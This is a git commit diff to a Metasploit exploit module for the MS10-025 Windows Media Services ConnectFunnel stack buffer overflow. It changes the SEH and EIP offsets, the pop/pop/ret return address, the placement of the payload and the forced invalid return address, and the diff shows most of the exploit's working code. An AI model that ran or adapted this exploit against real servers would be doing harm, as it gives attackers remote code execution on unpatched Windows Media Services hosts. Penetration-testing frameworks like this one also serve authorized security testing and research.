change exit func and ensure return is invalid (causes exception)

git-svn-id: file:///home/svn/framework3/trunk@9162 4d416f70-5f16-0410-b530-b9f4589650da
2024-11-12 11:52:01 +01:00 · 2010-04-27 19:13:56 +00:00 · 2010-04-27 19:13:56 +00:00 · 8a0785f91e
commit 8a0785f91e
parent 7a0e2f11af
1 changed files with 17 additions and 10 deletions
--- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
+++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
@ -19,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
 			'Description'    => %q{
-					This module exploits a stack buffer overflow in the Windows Media 
+					This module exploits a stack buffer overflow in the Windows Media
 				Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially
 				crafted FunnelConnect request, an attacker can execute arbitrary code
 				under the "NetShowServices" user account. Windows Media Services 4.1 ships
 				with Windows 2000 Server, but is not installed by default.

-				NOTE: This service does NOT restart automatically. Successful, as well as 
+				NOTE: This service does NOT restart automatically. Successful, as well as
 				unsuccessful exploitation attempts will kill the service which prevents
 				additional attempts.
 			},
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultOptions' =>
 				{
-					'EXITFUNC' => 'thread',
+					'EXITFUNC' => 'process',
 				},
 			'Payload'        =>
 				{
@ -60,10 +60,11 @@ class Metasploit3 < Msf::Exploit::Remote
 							# "Patched":
 							# SEH handler offset is 832
 							'Offset' => 840,
-							'Offsets' => [ 832, 840 ],
+							'SEHOffsets' => [ 832, 840 ],
+							'EIPOffset' => 652+3,
 							'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
-						} 
-					], 
+						}
+					],
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => 'Apr 13 2010',
@ -88,7 +89,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		cmd_buf << make_command(0x30001, subscriber)

 		# LinkViewerToMacConnectFunnel
-		#name = Rex::Text.pattern_create(512)
 		name = ''
 		name << "\\\\"
 		name << rand_text((target['Offset'] + 4 + 5) / 2)
@ -97,12 +97,15 @@ class Metasploit3 < Msf::Exploit::Remote

 		# Convert it to Unicode..
 		name = Rex::Text.to_unicode(name)
+		stuff = Rex::Text.pattern_create((target['Offset'] + 4 + 5) + 4)
+		stuff.slice!(0,4)
+		name[4,stuff.length] = stuff

-		# Insert the return address..
+		# Insert the payload..
 		name[4,payload.encoded.length] = payload.encoded

 		# Build the SEH frame that leads to the payload...
-		target['Offsets'].each { |off|
+		target['SEHOffsets'].each { |off|
 			seh = ''
 			case off
 			when 832
@ -120,6 +123,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			name[off,seh.length] = seh
 		}

+		# Make sure the return address points at an invalid address
+		off = target['EIPOffset']
+		name[off,1] = [0x80 + rand(0x7f)].pack('C')
+
 		# Add it to the command buffer..
 		cmd_buf << make_command(0x30002, name)

@ -144,7 +151,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# The server doesn't like packets that are bigger...
 		raise RuntimeError, 'Length too big' if (len > 0x1000)
 		len /= 8
-		
+
 		# Pack the pieces in ...
 		pkt = [
 			1,0,0,0,           # rep, ver, verMinor, pad